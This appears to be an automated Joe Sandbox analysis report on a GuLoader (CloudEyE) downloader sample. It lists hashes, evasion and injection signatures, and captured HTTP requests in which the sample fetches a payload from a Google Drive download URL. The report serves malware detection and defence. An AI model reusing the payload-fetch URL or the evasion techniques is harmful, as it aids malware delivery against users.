Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eAvqHiIsgR.exe

Overview

General Information

Sample name:eAvqHiIsgR.exe
renamed because original name is a hash value
Original sample name:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
Analysis ID:1567591
MD5:61518cfded3109fac04ee916ab275c26
SHA1:c624a4ee78183d82fb8264f74953d32ddcae5481
SHA256:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • eAvqHiIsgR.exe (PID: 4872 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)
    • eAvqHiIsgR.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2943208218.0000000003404000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000D.00000002.3129745415.00000000021F4000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T17:33:47.033223+010028032702Potentially Bad Traffic192.168.2.749913172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: eAvqHiIsgR.exeAvira: detected
      Source: eAvqHiIsgR.exeReversingLabs: Detection: 60%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: eAvqHiIsgR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.7:49918 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49980 version: TLS 1.2
      Source: eAvqHiIsgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_0040646B FindFirstFileA,FindClose,5_2_0040646B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_004027A1 FindFirstFileA,5_2_004027A1
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 5_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49913 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:33:49 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-Pf2QYByosBJLJBfNTJWM0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC73R2BTp8KyqX94fn1-YfahOJ-mx8PRvpzs9iqOOlcz3Ogp-_OSVF-L7I75E7EN71YhqddZkt_HMAServer: UploadServerSet-Cookie: NID=519=YN3EBVFU0BIL8Ny8nG5eaVFavGzZnHUoNyvmjrFCKI7H1_e_QWhHV5Boa8t0MR8IMvT-X2820KBpxZXsPrqk2I06LtpWnKhFYFeZ8YZNrvZ9vPvhKw_1U3ap95OP5-xu96GCPa59GGvBTXhc7bbrbuVms5L8pAZSYMqGXoh-gAP0A-RFnJqRSIA; expires=Wed, 04-Jun-2025 16:33:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:34:04 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-7gsQP8-NCGjTzkraN1Fevg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC73NTmC9H6Y5FUq3dz1_NDNcaB0jNnPHXgrHByxyGcVGqR1S8_nrFjnJ4TceUsoIBj7Ik7zNPPI-wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:34:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-JIReUVT0q0e8uDKOVAttmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC69ySAe0KNWO5rkaOD054Bi1kHVVrcl2veSN3iLFrkDBa9N_JZbAGPX0N9tWsIacJWi-PtCrCyHWQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:34:36 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-qLiKVNPqKLZkGUXVrJvXtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6qAxvnDoPQ7jfn8D4kRK_EwyqLJiVgceit5Z3DkHqqkrMARPVc0BzfRS7wZNkh3X44P_09CYfBUwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:34:51 GMTContent-Security-Policy: script-src 'nonce-rSmFBeBLZOq4ow2P9yKQfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7ItwFfCTE56UG9Y_N8FctEVXYz1-bBUDNn7YEB9dyoK0M04987q3rWg7-Uel6pFrMWFs24XvSHpgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: eAvqHiIsgR.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: eAvqHiIsgR.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: eAvqHiIsgR.exe, 0000000D.00000001.2286991291.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: eAvqHiIsgR.exe, 0000000D.00000003.3050147519.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.3021938003.0000000003565000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2555295504.000000000356C000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2866212879.000000000354E000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 0000000D.00000003.2739342404.000000000356C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
